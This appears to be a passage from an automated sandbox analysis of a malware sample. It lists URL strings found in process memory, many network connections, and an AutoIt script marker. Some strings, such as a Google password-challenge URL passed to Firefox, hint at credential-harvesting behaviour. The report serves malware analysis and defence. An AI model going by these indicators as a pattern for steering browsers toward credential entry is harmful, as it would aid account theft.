Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3088112226.000001708360F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.000001708527D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3082674705.0000017083400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3089312930.0000017083631000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3090212714.0000017083652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.co
Source: file.exe, 00000000.00000003.2142550438.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142360796.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000162F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acc
Source: file.exe, 00000000.00000003.2142550438.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accesp
Source: file.exe, 00000000.00000003.2142360796.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000162F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3110614517.000001708BF0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3088112226.000001708360F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3082674705.0000017083400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3089312930.0000017083631000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3090212714.0000017083652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001B.00000003.3203526143.000001708CD58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: file.exe, 00000000.00000003.2183302624.0000000005772000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3094262647.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3203132359.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2183302624.0000000005772000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3094262647.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085628000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3203132359.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3145541986.0000017085580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085605000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/PromiseUtils.sys.mjsresource://gre/module
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708441B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001B.00000002.3303896282.0000017084303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303896282.00000170843A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708441B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3326376483.000001708512A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708313F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3069443175.00000181E6B47000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3078393329.000001D91287A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdDownloader:onStopReq
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdfirefox-desktop-pass
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50082 version: TLS 1.2

System Summary

Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_797f023c-1
